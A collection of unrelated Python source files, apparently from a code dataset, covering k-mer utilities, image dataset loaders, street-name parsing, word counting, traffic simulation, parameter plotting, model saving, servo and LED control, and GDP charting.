yield l1, l2
def make_dir(dirname):
"""
Makes the directory; doesn't throw an error if it exists.
"""
if not os.path.exists(dirname):
try:
os.makedirs(dirname)
except:
print 'The directory was made by another thread extremely recently.'
def file_exists(fname):
"""
makes sure a given file exists
"""
if not os.path.exists(fname):
return False
fstats = os.stat(fname)
if not fstats[6]:
return False
if not os.access(fname, os.R_OK):
raise ValueError('Input File %s cannot be read' % fname)
return True
def getBinIndex_soft_upper(v, bins):
for i in range(len(bins) - 1):
if v > bins[i] and v <= bins[i + 1]:
return i
return -1
def get_barcode(line):
"""
- Extracts the barcode from the first line of a fastq quartet
- Assumes the first line is of the form:
@D5FF8JN1:4:1101:1220:2099#ACTTGA/1
"""
return line.split('#')[-1].split('/')[0]
def get_index_from_kmer(kmer):
"""
returns the base10 version of the base 4 DNA representation
"""
index = 0
base2face = {'A': 0, 'C': 1, 'G': 2, 'T': 3}
for i, base in enumerate(kmer):
if not base in 'ACGT':
return -1
power = len(kmer) - 1 - i
index += base2face[base] * (4 ** power)
return index
def get_kmer_from_index(kmax, index):
"""
takes a number (essentially base 4)
and returns the kmer it corresponds to in alphabetical order
eg.
    AAAA = 0
    CA = 1*4 + 0*1 = 4
    GC = 2*4 + 1*1 = 9
"""
bases = 'ACGT'
out = ''
for k in range(kmax - 1, -1, -1):
face, index = divmod(index, 4 ** k)
out += bases[face]
return out
def yield_kmers(k):
"""
An iterater to all kmers of length k in alphabetical order
"""
bases = 'ACGT'
for kmer in itertools.product(bases, repeat=k):
yield ''.join(kmer)
def aopen(file, mode='r'):
if file[-3:] == '.gz':
return gzip.open(file, mode + 'b')
else:
return open(file, mode)
def hamming_N(str1, str2):
if not len(str1) == len(str2):
        raise ValueError('lengths don\'t match')
str1 = str1.upper()
str2 = str2.upper()
str1 = str1.replace('N', '#')
return sum(itertools.imap(operator.ne, str1, str2))
def pairwise(iterable):
"""s -> (s0,s1), (s1,s2), (s2, s3), ..."""
a, b = itertools.tee(iterable)
next(b, None)
return itertools.izip(a, b)
# from http://code.activestate.com/recipes/499304-hamming-distance/
def hamming_distance(str1, str2):
assert len(str1) == len(str2)
ne = operator.ne
return sum(itertools.imap(ne, str1, str2))
def iterNlines(inFile, N):
assert N >= 1
with aopen(inFile) as f:
lines = [f.readline() for i in range(N)]
while True:
yield lines
lines = [f.readline() for i in range(N)]
if lines[0] == '':
break
def save_fig(fig1, path, extensions=['png', 'pdf']):
for ext in extensions:
fig1.savefig(path + '.' + ext, transparent=True, dpi = 900)
def simpleaxis(sp):
sp.spines['top'].set_visible(False)
sp.spines['right'].set_visible(False)
sp.get_xaxis().tick_bottom()
sp.get_yaxis().tick_left()
def close_float_value(a, b, max_percent=1.0):
if a == 0 and b == 0:
return True
if not (a > 0 and b > 0):
return False
ratio = float(max(a, b)) / float(min(a, b))
percent_increase = (ratio - 1.0) * 100.0
return percent_increase < max_percent
def significantly_enriched(xs, zthresh=2., scale='linear'):
assert scale in ['linear', 'log']
if scale =='log':
xs = np.log2(xs)
xs = stats.zscore(xs)
return [x > zthresh for x in xs]
def iter4Lines(inFile):
return iterNlines(inFile, 4)
def getAllMismatchedSeqs(kmer, mismatchPositions):
nucs = ['A', 'C', 'G', 'T']
#generate tuples of allowed nucs at each mismatch position using a recursive algorithm
allowedNucs = {}
mismatchPositions = np.array(mismatchPositions)
assert len(set(mismatchPositions)) == len(mismatchPositions)
if len(mismatchPositions) == 0:
yield kmer
else:
mismatchNucs = [] + nucs
#print kmer
#print mismatchPositions
#print mismatchPositions[0]
#print kmer[mismatchPositions[0]]
mismatchNucs.remove(kmer[mismatchPositions[0]])
        # materialize the generator so it can be re-iterated for every mismatch nucleotide
        downstreamMismatchSeqs = list(getAllMismatchedSeqs(kmer[mismatchPositions[0]+1:], mismatchPositions[1:]-(mismatchPositions[0]+1)))
for mismatchNuc in mismatchNucs:
for downstreamMismatchSeq in downstreamMismatchSeqs:
returnSeq = kmer[:mismatchPositions[0]] + mismatchNuc +downstreamMismatchSeq
assert len(returnSeq) == len(kmer)
yield returnSeq
def getPaddedMismatchedAdjacentKmers(kmerSequence, padding, numMismatches):
'''
Yield all sequences of length (len(kmerSequence)+padding )that contain the given kmer, with exactly the given number of mismatches.
The order yielded is as follows:
First mismatches are allowed at position 0 to (numMismatches-1)
For each register:
Iterate through all possible nucs at mismatch position in alphabetical order
Iterate through each nucleotide in padding positions in alphabetical order.
Shift to next register
Move most 3' mismatch position down by one, but not past the end of the kmerSequence if end of KmerSequence
is reached, shift secondmost 3' mismatch 1 nt 3', and reset most 3' mismatch to 1nt 3' of that one
'''
# for troubleshooting, want to check that no repeats are generated, so will assert that size of this list and set
# must be the same
kmer_set = set()
kmer_list =[]
upper_to_combined = {}
nucs = 'ACGT'
#initialize mismatchPositions
#print numMismatches
if numMismatches == 0:
for mismatchedKmer in [kmerSequence]:
for shift in range(padding+1):
#generate all possible mismatches to the kmer
for leftPaddingSeq in [''.join(i) for i in itertools.product(nucs, repeat = shift)]:
for rightPaddingSeq in [''.join(i) for i in itertools.product(nucs, repeat = padding-shift)]:
paddedSeq = leftPaddingSeq+mismatchedKmer+rightPaddingSeq
if paddedSeq not in kmer_set:
kmer_list.append(paddedSeq)
kmer_set.add(paddedSeq)
else:
mismatchPositionsList = itertools.combinations(range(len(kmerSequence)), numMismatches)
for mismatchPositions in mismatchPositionsList:
#print mismatchPositions
for mismatchedKmer in getAllMismatchedSeqs(kmerSequence, mismatchPositions):
for shift in range(padding+1):
#generate all possible mismatches to the kmer
for leftPaddingSeq in [''.join(i) for i in itertools.product(nucs, repeat = shift)]:
for rightPaddingSeq in [''.join(i) for i in itertools.product(nucs, repeat = padding-shift)]:
paddedSeq = leftPaddingSeq+mismatchedKmer+rightPaddingSeq
paddedUpper = paddedSeq.upper()
if paddedUpper not in kmer_set:
kmer_list.append(paddedUpper)
kmer_set.add(paddedUpper)
#print kmer_list
#print kmer_set
#print len(kmer_list), len(kmer_set)
#assert len(kmer_list) == len(kmer_set)
return kmer_list
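# Illustrative sketch, not part of the original module: a quick sanity check of the
# k-mer index round trip and of the zero-mismatch padded k-mer enumeration defined
# above. The example k-mers are arbitrary.
if __name__ == '__main__':
    idx = get_index_from_kmer('AGC')
    print(idx)                            # 0*16 + 2*4 + 1 = 9
    print(get_kmer_from_index(3, idx))    # round-trips back to 'AGC'
    # all sequences of length 4 that contain 'ACG' exactly (1 nt of padding, 0 mismatches)
    print(getPaddedMismatchedAdjacentKmers('ACG', 1, 0))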
|
StarcoderdataPython
|
4835289
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import numpy as np
import paddle
from paddle.io import Dataset
import os
import cv2
from ppcls.data import preprocess
from ppcls.data.preprocess import transform
from ppcls.utils import logger
from .common_dataset import create_operators
class CompCars(Dataset):
def __init__(self,
image_root,
cls_label_path,
label_root=None,
transform_ops=None,
bbox_crop=False):
self._img_root = image_root
self._cls_path = cls_label_path
self._label_root = label_root
if transform_ops:
self._transform_ops = create_operators(transform_ops)
self._bbox_crop = bbox_crop
self._dtype = paddle.get_default_dtype()
self._load_anno()
def _load_anno(self):
assert os.path.exists(self._cls_path)
assert os.path.exists(self._img_root)
if self._bbox_crop:
assert os.path.exists(self._label_root)
self.images = []
self.labels = []
self.bboxes = []
with open(self._cls_path) as fd:
lines = fd.readlines()
for l in lines:
l = l.strip().split()
if not self._bbox_crop:
self.images.append(os.path.join(self._img_root, l[0]))
self.labels.append(int(l[1]))
else:
label_path = os.path.join(self._label_root,
l[0].split('.')[0] + '.txt')
assert os.path.exists(label_path)
with open(label_path) as f:
bbox = f.readlines()[-1].strip().split()
bbox = [int(x) for x in bbox]
self.images.append(os.path.join(self._img_root, l[0]))
self.labels.append(int(l[1]))
self.bboxes.append(bbox)
assert os.path.exists(self.images[-1])
def __getitem__(self, idx):
img = cv2.imread(self.images[idx])
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
if self._bbox_crop:
bbox = self.bboxes[idx]
img = img[bbox[1]:bbox[3], bbox[0]:bbox[2], :]
if self._transform_ops:
img = transform(img, self._transform_ops)
img = img.transpose((2, 0, 1))
return (img, self.labels[idx])
def __len__(self):
return len(self.images)
@property
def class_num(self):
return len(set(self.labels))
class VeriWild(Dataset):
def __init__(
self,
image_root,
cls_label_path,
transform_ops=None, ):
self._img_root = image_root
self._cls_path = cls_label_path
if transform_ops:
self._transform_ops = create_operators(transform_ops)
self._dtype = paddle.get_default_dtype()
self._load_anno()
def _load_anno(self):
assert os.path.exists(self._cls_path)
assert os.path.exists(self._img_root)
self.images = []
self.labels = []
self.cameras = []
with open(self._cls_path) as fd:
lines = fd.readlines()
for l in lines:
l = l.strip().split()
self.images.append(os.path.join(self._img_root, l[0]))
self.labels.append(np.int64(l[1]))
self.cameras.append(np.int64(l[2]))
assert os.path.exists(self.images[-1])
def __getitem__(self, idx):
try:
with open(self.images[idx], 'rb') as f:
img = f.read()
if self._transform_ops:
img = transform(img, self._transform_ops)
img = img.transpose((2, 0, 1))
return (img, self.labels[idx], self.cameras[idx])
except Exception as ex:
logger.error("Exception occured when parse line: {} with msg: {}".
format(self.images[idx], ex))
rnd_idx = np.random.randint(self.__len__())
return self.__getitem__(rnd_idx)
def __len__(self):
return len(self.images)
@property
def class_num(self):
return len(set(self.labels))
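# Illustrative sketch, not part of the original module: how a CompCars dataset might be
# wired up. The directory layout and label-list file below are assumptions, and the
# example requires the dataset to be present on disk.
if __name__ == "__main__":
    dataset = CompCars(
        image_root="./dataset/CompCars/image",                # assumed image directory
        cls_label_path="./dataset/CompCars/train_list.txt",   # assumed "path label" list file
        label_root="./dataset/CompCars/label",                # assumed bbox label directory
        transform_ops=None,
        bbox_crop=False)
    print(len(dataset), dataset.class_num)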
|
StarcoderdataPython
|
3287655
|
<filename>catatom2osm/hgwnames.py<gh_stars>0
"""Parsing of highway names."""
import re
from fuzzywuzzy import fuzz, process
from catatom2osm import config
MATCH_THR = 60
def normalize(text):
return re.sub(r" *\(.*\)", "", text.lower().strip())
def parse(name):
"""Transform the name of a street from Cadastre conventions to OSM ones."""
name = name.split(";")[0] # Remove additional information
name = re.sub(r"[,]+", ", ", name).strip() # Avoids comma without trailing space
result = []
for (i, word) in enumerate(re.split(r"[ ]+", name.strip())):
nude_word = re.sub(r"^\(|\)$", "", word) # Remove enclosing parenthesis
if i == 0:
if word in config.excluded_types:
return ""
else:
new_word = config.highway_types.get(word, word.title())
elif nude_word in config.lowcase_words: # Articles
new_word = word.lower()
elif "'" in word[1:-1]: # Articles with aphostrope
left = word.split("'")[0]
right = word.split("'")[-1]
if left in ["C", "D", "L", "N", "S"]:
new_word = left.lower() + "'" + right.title()
elif right in ["S", "N", "L", "LA", "LS"]:
new_word = left.title() + "'" + right.lower()
else:
new_word = word.title()
else:
new_word = word.title()
new_word = new_word.replace("·L", "·l") # Letra ele geminada
new_word = new_word.replace(".L", "·l") # Letra ele geminada
result.append(new_word)
return " ".join(result).strip()
def match(name, choices):
"""
Fuzzy search best match for string name in iterable choices.
If the result is not good enough returns the name parsed.
Args:
name (str): String to look for
choices (list): Iterable with choices
"""
parsed_name = parse(name)
if fuzz and parsed_name:
normalized = [normalize(c) for c in choices]
try:
matching = process.extractOne(
normalize(parsed_name), normalized, scorer=fuzz.token_sort_ratio
)
if matching and matching[1] > MATCH_THR:
return choices[normalized.index(matching[0])]
except RuntimeError:
pass
return parsed_name
def dsmatch(name, dataset, fn):
"""
Fuzzy search best matching object for string name in dataset.
Args:
name (str): String to look for
dataset (list): List of objects to search for
fn (function): Function to obtain a string from a element of the dataset
Returns:
        First element with the maximum fuzzy ratio.
"""
max_ratio = 0
matching = None
for e in dataset:
if fuzz and name:
ratio = fuzz.token_sort_ratio(normalize(name), normalize(fn(e)))
if ratio > max_ratio:
max_ratio = ratio
matching = e
elif normalize(name) == normalize(fn(e)):
matching = e
break
return matching
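# Illustrative sketch, not part of the original module: fuzzy-matching a Cadastre-style
# street name against a list of OSM names. The sample strings below are made up.
if __name__ == "__main__":
    osm_names = ["Calle Mayor", "Calle Menor", "Avenida del Puerto"]
    print(match("CL MAYOR", osm_names))
    print(dsmatch("CL MAYOR", osm_names, lambda s: s))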
|
StarcoderdataPython
|
3363787
|
f = open('text.txt')
text = f.read()
# Dictionary (morphological analyzer)
import pymorphy2
morph = pymorphy2.MorphAnalyzer()
def LEG (word):
p = morph.parse(word)[0]
pp = p.normal_form
return pp
#print(LEG('звери'))
LEG ('звери')
# e = list of punctuation marks to strip (format: ,"#punctuation mark")
e = ",", ".","!","-","?","»","«","—"
for i in range(len(e)):
text = text.replace(e[i], "")
# Text without punctuation
print(text)
# Text as a list of words
lll = text.split()
print(lll)
print(type(lll))
# lower(): convert every word to lowercase
low_text = list(map(str.lower, lll))
# lemmatize the lowercased words
low_text = list(map(LEG, low_text))
print(low_text)
dictt = {}
for word in low_text:
# print(dictt)
if word in dictt:
dictt[word] +=1
else:
dictt.update({word:1})
list_d = list(dictt.items())
list_d.sort(key=lambda i: i[1])
for i in list_d:
print(i[0], ':', i[1])
# print("yes!")
# for word in word_list:
# #2) check whether the key is in the dictionary word_count = {};
# if word in word_count:
#
# #3) create the key in the dictionary:
# word_count[word] = 0
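# An equivalent, more idiomatic way to do the frequency count above is
# collections.Counter; this sketch prints the same counts, most frequent first.
from collections import Counter
word_counts = Counter(low_text)
for word, count in word_counts.most_common():
    print(word, ':', count)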
|
StarcoderdataPython
|
39280
|
import sim
import utils
import numpy as np
import matplotlib.pyplot as plt
import argparse
def main():
my_parser = argparse.ArgumentParser(description='Parameters for Simulation')
my_parser.add_argument('-N', '--n_cars', type=int, action='store', help='Number of cars', default = 40)
my_parser.add_argument('-L', '--length', type=int, action='store', help='Length of road', default = 250)
my_parser.add_argument('-P', '--p_break', type=float, action='store', help='probability of stopping', default = 0.1)
my_parser.add_argument('-S', '--steps', type=int, action='store', help='Steps of simulation', required = True)
args = my_parser.parse_args()
print(dir(args))
N=args.n_cars
L=args.length
pos = np.zeros(N)
vel = np.zeros(N)
sim.populate_arrays(pos,vel,N)
pos_list = sim.run_simulation(pos,vel,N,L, MAX_STEPS=args.steps, p = args.p_break)
flow = utils.estimate_flow(pos_list,N, 0,250)
sim_fig = utils.plot_simulation(pos_list)
plt.show()
if __name__ == '__main__':
main()
|
StarcoderdataPython
|
3285648
|
import matplotlib.pyplot as plt
from matplotlib.ticker import MaxNLocator
import numpy as np
from .reference_points import create_references
from .clust_color import assign_colors
from .misc import process_result_list
def parameters(results, ax=None, free_indices_only=True, lb=None, ub=None,
size=None, reference=None, colors=None, legends=None,
balance_alpha=True, start_indices=None):
"""
Plot parameter values.
Parameters
----------
results: pypesto.Result or list
Optimization result obtained by 'optimize.py' or list of those
ax: matplotlib.Axes, optional
Axes object to use.
free_indices_only: bool, optional
If True, only free parameters are shown. If
False, also the fixed parameters are shown.
lb, ub: ndarray, optional
If not None, override result.problem.lb, problem.problem.ub.
Dimension either result.problem.dim or result.problem.dim_full.
size: tuple, optional
Figure size (width, height) in inches. Is only applied when no ax
object is specified
reference: list, optional
        List of reference points for optimization results, containing at
        least a function value fval
colors: list, or RGBA, optional
list of colors, or single color
color or list of colors for plotting. If not set, clustering is done
and colors are assigned automatically
legends: list or str
Labels for line plots, one label per result object
balance_alpha: bool (optional)
Flag indicating whether alpha for large clusters should be reduced to
avoid overplotting (default: True)
start_indices: list or int
list of integers specifying the multistarts to be plotted or
int specifying up to which start index should be plotted
Returns
-------
ax: matplotlib.Axes
The plot axes.
"""
# parse input
(results, colors, legends) = process_result_list(results, colors, legends)
for j, result in enumerate(results):
# handle results and bounds
(lb, ub, x_labels, fvals, xs) = \
handle_inputs(result=result, lb=lb, ub=ub,
free_indices_only=free_indices_only,
start_indices=start_indices)
# call lowlevel routine
ax = parameters_lowlevel(xs=xs, fvals=fvals, lb=lb, ub=ub,
x_labels=x_labels, ax=ax, size=size,
colors=colors[j], legend_text=legends[j],
balance_alpha=balance_alpha)
# parse and apply plotting options
ref = create_references(references=reference)
# plot reference points
for i_ref in ref:
# reduce parameter vector in reference point, if necessary
if free_indices_only:
x_ref = np.array(result.problem.get_reduced_vector(i_ref['x']))
else:
x_ref = np.array(i_ref['x'])
x_ref = np.reshape(x_ref, (1, x_ref.size))
# plot reference parameters using lowlevel routine
ax = parameters_lowlevel(x_ref, [i_ref['fval']], ax=ax,
colors=i_ref['color'],
linestyle='--',
legend_text=i_ref.legend,
balance_alpha=balance_alpha)
return ax
def parameters_lowlevel(xs, fvals, lb=None, ub=None, x_labels=None,
ax=None, size=None, colors=None, linestyle='-',
legend_text=None, balance_alpha=True):
"""
Plot parameters plot using list of parameters.
Parameters
----------
xs: nested list or array
Including optimized parameters for each startpoint.
Shape: (n_starts, dim).
fvals: numeric list or array
Function values. Needed to assign cluster colors.
lb, ub: array_like, optional
The lower and upper bounds.
x_labels: array_like of str, optional
Labels to be used for the parameters.
ax: matplotlib.Axes, optional
Axes object to use.
size: tuple, optional
see parameters
colors: list of RGBA
One for each element in 'fvals'.
linestyle: str, optional
linestyle argument for parameter plot
legend_text: str
Label for line plots
balance_alpha: bool (optional)
Flag indicating whether alpha for large clusters should be reduced to
avoid overplotting (default: True)
Returns
-------
ax: matplotlib.Axes
The plot axes.
"""
# parse input
xs = np.array(xs)
fvals = np.array(fvals)
if size is None:
# 0.5 inch height per parameter
size = (18.5, xs.shape[1] / 2)
if ax is None:
ax = plt.subplots()[1]
fig = plt.gcf()
fig.set_size_inches(*size)
# assign colors
colors = assign_colors(vals=fvals, colors=colors,
balance_alpha=balance_alpha)
# parameter indices
parameters_ind = list(range(1, xs.shape[1] + 1))[::-1]
# plot parameters
ax.xaxis.set_major_locator(MaxNLocator(integer=True))
for j_x, x in reversed(list(enumerate(xs))):
if j_x == 0:
tmp_legend = legend_text
else:
tmp_legend = None
ax.plot(x, parameters_ind,
linestyle,
color=colors[j_x],
marker='o',
label=tmp_legend)
plt.yticks(parameters_ind, x_labels)
# draw bounds
parameters_ind = np.array(parameters_ind).flatten()
if lb is not None:
ax.plot(lb.flatten(), parameters_ind, 'k--', marker='+')
if ub is not None:
ax.plot(ub.flatten(), parameters_ind, 'k--', marker='+')
ax.set_xlabel('Parameter value')
ax.set_ylabel('Parameter index')
ax.set_title('Estimated parameters')
if legend_text is not None:
ax.legend()
return ax
def handle_inputs(result, free_indices_only, lb=None, ub=None,
start_indices=None):
"""
Computes the correct bounds for the parameter indices to be plotted and
    outputs the corresponding parameters and their labels
Parameters
----------
result: pypesto.Result
Optimization result obtained by 'optimize.py'.
free_indices_only: bool, optional
If True, only free parameters are shown. If
False, also the fixed parameters are shown.
lb, ub: ndarray, optional
If not None, override result.problem.lb, problem.problem.ub.
Dimension either result.problem.dim or result.problem.dim_full.
start_indices: list or int
list of integers specifying the multistarts to be plotted or
int specifying up to which start index should be plotted
Returns
-------
lb, ub: ndarray
Dimension either result.problem.dim or result.problem.dim_full.
x_labels: list of str
ytick labels to be applied later on
fvals: ndarray
objective function values which are needed for plotting later
xs: ndarray
parameter values which will be plotted later
"""
# retrieve results
fvals = result.optimize_result.get_for_key('fval')
xs = result.optimize_result.get_for_key('x')
# parse indices which should be plotted
if start_indices is not None:
start_indices = np.array(start_indices, dtype=int)
# reduce number of displayed results
xs_out = [xs[ind] for ind in start_indices]
fvals_out = [fvals[ind] for ind in start_indices]
else:
# use non-reduced versions
xs_out = xs
fvals_out = fvals
# get bounds
if lb is None:
lb = result.problem.lb
if ub is None:
ub = result.problem.ub
# get labels
x_labels = result.problem.x_names
# handle fixed and free indices
if free_indices_only:
for ix, x in enumerate(xs_out):
xs_out[ix] = result.problem.get_reduced_vector(x)
lb = result.problem.get_reduced_vector(lb)
ub = result.problem.get_reduced_vector(ub)
x_labels = [x_labels[int(i)] for i in result.problem.x_free_indices]
else:
lb = result.problem.get_full_vector(lb)
ub = result.problem.get_full_vector(ub)
return lb, ub, x_labels, fvals_out, xs_out
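# Illustrative sketch, not part of the original module: calling the low-level plotting
# routine directly with synthetic optimizer output. All values below are made up.
if __name__ == '__main__':
    demo_xs = np.random.randn(5, 3)            # 5 multistarts, 3 parameters
    demo_fvals = np.sort(np.random.rand(5))    # pretend objective values
    demo_ax = parameters_lowlevel(demo_xs, demo_fvals,
                                  lb=np.full(3, -3.0), ub=np.full(3, 3.0),
                                  x_labels=['k1', 'k2', 'k3'])
    plt.show()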
|
StarcoderdataPython
|
1745982
|
<gh_stars>0
import tarfile
import tempfile
import json
import shutil
import torch
import torch.nn as nn
class BaseNet(nn.Module, object):
def __init__(self, **kwargs):
super(BaseNet, self).__init__()
# Keep all the __init__parameters for saving/loading
self.net_parameters = kwargs
def save(self, filename):
with tarfile.open(filename, "w") as tar:
temporary_directory = tempfile.mkdtemp()
name = "{}/net_params.json".format(temporary_directory)
json.dump(self.net_parameters, open(name, "w"))
tar.add(name, arcname="net_params.json")
name = "{}/state.torch".format(temporary_directory)
torch.save(self.state_dict(), name)
tar.add(name, arcname="state.torch")
shutil.rmtree(temporary_directory)
return filename
@classmethod
def load(cls, filename, device=torch.device('cpu')):
with tarfile.open(filename, "r") as tar:
net_parameters = json.loads(
tar.extractfile("net_params.json").read().decode("utf-8"))
path = tempfile.mkdtemp()
tar.extract("state.torch", path=path)
net = cls(**net_parameters)
net.load_state_dict(
torch.load(
path + "/state.torch",
map_location=device,
)
)
return net, net_parameters
def clean_locals(**kwargs):
del kwargs['self']
del kwargs['__class__']
return kwargs
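# Illustrative sketch, not part of the original module: a minimal BaseNet subclass showing
# how clean_locals() feeds the constructor arguments that save()/load() round-trip through
# net_params.json. The layer sizes and file name are arbitrary assumptions.
class TinyNet(BaseNet):
    def __init__(self, in_features=4, out_features=2):
        # clean_locals strips 'self' and '__class__', leaving only the real kwargs
        super().__init__(**clean_locals(**locals()))
        self.fc = nn.Linear(in_features, out_features)

    def forward(self, x):
        return self.fc(x)


if __name__ == "__main__":
    net = TinyNet()
    path = net.save("tinynet.tar")
    restored, params = TinyNet.load(path)
    print(params)  # {'in_features': 4, 'out_features': 2}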
|
StarcoderdataPython
|
3387169
|
import RPi.GPIO as GPIO
import time
GPIO.setmode(GPIO.BOARD)
GPIO.setup(7, GPIO.OUT)
p = GPIO.PWM(7, 50)   # 50 Hz PWM, typical for hobby servos
try:
    p.start(7.5)            # start near the centre position
    time.sleep(1)
    p.ChangeDutyCycle(2.5)  # move to one extreme
    time.sleep(2)
    p.ChangeDutyCycle(7.5)  # back to centre
except KeyboardInterrupt:
    pass
finally:
    p.stop()
    GPIO.cleanup()
|
StarcoderdataPython
|
1731441
|
<filename>gemtown/modelers/migrations/0002_auto_20190420_1510.py
# Generated by Django 2.0.13 on 2019-04-20 06:10
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('modelers', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.AddField(
model_name='modeler',
name='creator',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='modeler_creator', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='likeofmodeler',
name='creator',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, related_name='likeOfModel_creator', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='likeofmodeler',
name='modeler',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, related_name='likeOfModel_modeler', to='modelers.Modeler'),
),
migrations.AddField(
model_name='commentofmodeler',
name='creator',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, related_name='comment_creator', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='commentofmodeler',
name='modeler',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, related_name='comment_modeler', to='modelers.Modeler'),
),
]
|
StarcoderdataPython
|
3265059
|
from roamtokenize import WordOnlyTokenizer
import re
from nltk.tokenize import sent_tokenize
normalization_patterns = [
("long_punctuation_formatting", '(\-{3,}|\.{3,}|\_{3,})',' FORMATTING '),
("de-ids", '(([0-9]+[A-Z]+)+[0-9]*|([A-Z]+[0-9]+)+[A-Z]*)', " DEIDENTIFIED "),
("data_re", r"\*\*DATE\[\d\d/\d\d(/\d\d\d\d)?]", " DATE "),
("initial", r" [A-Z]\.", "INITIAL"),
("number_re", '[0-9]+', 'NUMBER')]
#("whitespace", '\s', ' ')]
p_to_test = ['date_re', 'number_re']
def normalize(text):
for pattern in normalization_patterns:
text = re.sub(pattern[1], pattern[2], text)
return text
def tokenize(text):
text = [sent_tokenize(s) for s in text.split('\n') if s]
sentences = [[word_tokenize(sent) for sent in line] for line in text]
sentences = '\n'.join(['\n'.join(s) for s in sentences])
return sentences
TOKENIZER = WordOnlyTokenizer()
def word_tokenize(text):
return " ".join(TOKENIZER.tokenize(text))
|
StarcoderdataPython
|
103480
|
# -*- coding: utf-8 -*-
"""
Created on Sun Nov 14 21:24:02 2021
@author: JOSEP
"""
import pandas as pd
import numpy as np
import matplotlib
df = pd.read_csv("NFT_Sales.csv")
nft_df = df
nft_df.head()
nft_df["NaN"] = df.apply(lambda x: 1 if x.isna() else 0, axis=1)
missing_values = nft_df.isnull()
nft_df["NaN"] = missing_values.apply(lambda x: 1 if x else 0, axis=1)
for col in missing_values.columns:
print(col)
print(nft_df[col].isnull().any())
nft_df["NaN"] = nft_df[col].isnull().any()
# nft_df=groupby(by="Year").count()
nft_df["NaN"] = missing_values["Date"].apply(lambda x: 1 if x else x)
nft_df["col1"].isnull().any()
|
StarcoderdataPython
|
3334490
|
<reponame>staguchi0703/ABC164
def resolve():
'''
code here
'''
S = input()
def chk(num_str):
temp = int(num_str) % 2019
if temp == 0:
return True
else:
return False
ans_set = [ str((i+1) * 2019) for i in range(2*10**5//2019)]
cnt = 0
temp = ''
for i in range(len(S)):
        for j in range(i + 1, len(S) + 1):
            if chk(S[i:j]):
cnt += 1
print(cnt)
if __name__ == "__main__":
resolve()
|
StarcoderdataPython
|
1601707
|
<filename>rpi-rgb-led-matrix-master/matrixtest.py
#!/usr/bin/python
# Simple RGBMatrix example, using only Clear(), Fill() and SetPixel().
# These functions have an immediate effect on the display; no special
# refresh operation needed.
# Requires rgbmatrix.so present in the same directory.
import time
from rgbmatrix import Adafruit_RGBmatrix
# Rows and chain length are both required parameters:
matrix = Adafruit_RGBmatrix(32, 1)
# Flash screen red, green, blue (packed color values)
matrix.Fill(0xFF0000)
time.sleep(1.0)
matrix.Fill(0x00FF00)
time.sleep(1.0)
matrix.Fill(0x0000FF)
time.sleep(1.0)
# Show RGB test pattern (separate R, G, B color values)
for b in range(16):
for g in range(8):
for r in range(8):
matrix.SetPixel(
(b / 4) * 8 + g,
(b & 3) * 8 + r,
(r * 0b001001001) / 2,
(g * 0b001001001) / 2,
b * 0b00010001)
time.sleep(10.0)
matrix.Clear()
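# Illustrative sketch, not part of the original example: how separate R, G, B byte
# values can be packed into the 0xRRGGBB integers passed to matrix.Fill() above.
def pack_rgb(r, g, b):
    return (r << 16) | (g << 8) | b

# e.g. pack_rgb(255, 0, 0) == 0xFF0000, the red used in the first Fill() call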
|
StarcoderdataPython
|
1786794
|
import pandas as pd
import matplotlib.pyplot as plt
from downloadTabelas import downloadTabela
import os
datasp = pd.DataFrame(columns=['ano', 'sp', 'sbc', 'g', 'c', 'sjc'])
# Downloading files in 'seade.gov.br'
downloadTabela()
# Excel to Pandas
import glob, os
os.chdir("C:/Users/Matheus/Documents/PIBbrasil/SeadeFiles/")
for file in glob.glob("*.xlsx"):
filesplit = file.split('pib_')[1]
filesplit2 = filesplit.split('.')[0]
year = filesplit2.split('-')[0]
#print(year)
df = pd.read_excel(file, header=10)
os.remove(file)
df.columns = ['MUNICIPIO', 'AGROPECUARIA', 'INDUSTRIA', 'ADM PUBLICA', 'SUBTOTAL', 'TOTAL', 'IMPOSTOS', 'PIB', 'PIB CAPITA']
datasp = datasp.append({
'ano': str(year),
'sp': df.loc[df['MUNICIPIO'] == "São Paulo"]['PIB CAPITA'].values,
'sbc': df.loc[df['MUNICIPIO'] == "São Bernardo do Campo"]['PIB CAPITA'].values,
'g': df.loc[df['MUNICIPIO'] == "Guarulhos"]['PIB CAPITA'].values,
'c': df.loc[df['MUNICIPIO'] == "Campinas"]['PIB CAPITA'].values,
'sjc': df.loc[df['MUNICIPIO'] == "São José dos Campos"]['PIB CAPITA'].values
}, ignore_index=True)
print(datasp)
# plotting
ax = plt.gca()
ax.set_facecolor('#F6F9ED')
datasp['sp'] = datasp['sp'].astype(float)
datasp['sbc'] = datasp['sbc'].astype(float)
datasp['g'] = datasp['g'].astype(float)
datasp['c'] = datasp['c'].astype(float)
datasp['sjc'] = datasp['sjc'].astype(float)
datasp.plot(kind='line', x='ano', y='sp', label='São Paulo (SP)', ax=ax, color='#42124C')
datasp.plot(kind='line', x='ano', y='c', label='Campinas (SP)', ax=ax, color='#2FF3E0')
datasp.plot(kind='line', x='ano', y='g', label='Guarulhos (SP)', ax=ax, color='#F8D210')
datasp.plot(kind='line', x='ano', y='sbc', label='São Bernardo do Campo (SP)', ax=ax, color='#FA26A0')
datasp.plot(kind='line', x='ano', y='sjc', label='São José dos Campos (SP)', ax=ax, color='#F51720')
ax.grid(False)
